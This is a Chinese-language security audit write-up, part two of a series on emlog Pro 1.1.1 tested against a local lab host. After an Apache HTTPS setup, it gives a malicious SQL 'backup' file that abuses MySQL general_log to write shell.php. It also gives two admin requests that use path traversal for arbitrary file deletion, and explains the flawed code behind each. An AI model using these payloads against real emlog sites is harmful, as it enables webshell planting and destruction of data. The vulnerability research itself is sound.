0x01 前言
应用商店的利用行不通了,,,接上文emlog Pro审计小记从1到0(一)
0x02 插曲
记录一下,利用 phpstudy 开启 443 服务的操作
data:image/s3,"s3://crabby-images/2e4e1/2e4e18d85e4d62978b69276488ab40d761613dd0" alt=""
取消 LoadModule ssl_module modules/mod_ssl.so 前的注释
data:image/s3,"s3://crabby-images/14282/14282fffd796213cbfa6c3d936360d5931e06495" alt=""
在 apache 服务 对应的 conf\vhosts 文件夹下 创建文件 vhosts_ssl.conf
Listen 443
SSLStrictSNIVHostCheck off
SSLCipherSuite AESGCM:ALL:!DH:!EXPORT:!RC4:+HIGH:!MEDIUM:!LOW:!aNULL:!eNULL
SSLProtocol all -SSLv2 -SSLv3
<VirtualHost *:443>
DocumentRoot "F:\Tools\phpstudy\WWW" #(网站根目录路径)
ServerName localhost #(更换成自己的域名)
ServerAlias localhost #(更换成自己的域名)
<Directory "F:\Tools\phpstudy\WWW"> #(网站根目录路径)
Options FollowSymLinks ExecCGI
AllowOverride All
Order allow,deny
Allow from all
Require all granted
</Directory>
SSLEngine on
SSLCertificateFile "F:\Tools\phpstudy\Extensions\Apache2.4.39\conf\ssl\server.crt" #(证书路径)
SSLCertificateKeyFile "F:\Tools\phpstudy\Extensions\Apache2.4.39\conf\ssl\server.key" #(证书路径)
</VirtualHost>
重启 apache 服务,即ok
data:image/s3,"s3://crabby-images/35b7e/35b7ede3f6975a3c67ef0c8bae2c257518cc158a" alt=""
备份数据文件 getshell
创建恶意 sql 文件
#version:emlog pro 1.1.1
#date:2022-01-25 12:27
#tableprefix:emlog_
set global general_log=on;
set global general_log_file='F:/Tools/phpstudy/WWW/emlog-pro-1.1.1/emlog-pro-1.1.1/shell.php';
select '<?php phpinfo(); ?>';
#the end of backup
在导入备份文件处导入恶意 sql 文件
data:image/s3,"s3://crabby-images/eb242/eb242628ba03eeb168509d8b9e716c9aafe5c464" alt=""
data:image/s3,"s3://crabby-images/9ad73/9ad738489a9f734e0c36097893457b3cff2b4691" alt=""
http://emlog.test/shell.php
data:image/s3,"s3://crabby-images/45d97/45d97c667e18a5d84db70f6541894f73021de386" alt=""
检测了备份 sql 文件的大小,后缀
data:image/s3,"s3://crabby-images/82c01/82c017a00b983cf42ae72ea6bc44dfa18a34f22d" alt=""
通过函数 checkSqlFileInfo 检测了sql 文件的文件头,再通过函数 backindata 来执行 sql 文件
data:image/s3,"s3://crabby-images/f8545/f8545cd3bd479f634bc2e40d6b7ec319b19f93f7" alt=""
将sql文件中的内容以数组的形式保存,然后遍历整个数组内容,通过query()去执行SQL语句。
任意文件删除(emDeleteFile)
通过全局搜索删除函数 unlink,发现函数 emDeleteFile
data:image/s3,"s3://crabby-images/1ecf1/1ecf120665d7f273a4073f118ead986f9fb056bf" alt=""
查找调用函数 emDeleteFile 的地方
删除模板
admin/template.php
data:image/s3,"s3://crabby-images/c34ee/c34ee2978fb63df147e0012ff3dae4c6ae6a927a" alt=""
对参数 tpl 并未进行过滤,所以可以通过构造数据包实现任意文件删除
http://emlog.test/admin/template.php?action=del&tpl=../../../template.txt&token=debf8f399b7a9f85e85f057245016ab74d9a3809
data:image/s3,"s3://crabby-images/bf200/bf2004f7727f66a619f92c88085811f0dddbead0" alt=""
删除插件
admin/plugin.php
data:image/s3,"s3://crabby-images/ff1c8/ff1c809b9e41b116151230e3353ff6fb15b99655" alt=""
对参数 $plugin 进行了正则处理,正则匹配仅获取了第一个 / 之前的数据,所以可以通过 \ 来进行替换
http://emlog.test/admin/plugin.php?action=del&plugin=..\..\..\plugin.txt&token=debf8f399b7a9f85e85f057245016ab74d9a3809
data:image/s3,"s3://crabby-images/afc8c/afc8cde004f54360dfbf6df3e3466d9dff2889b8" alt=""
0x03 小结
目前发现的都是后台利用的漏洞,所以一般适用于二次漏洞利用,,,,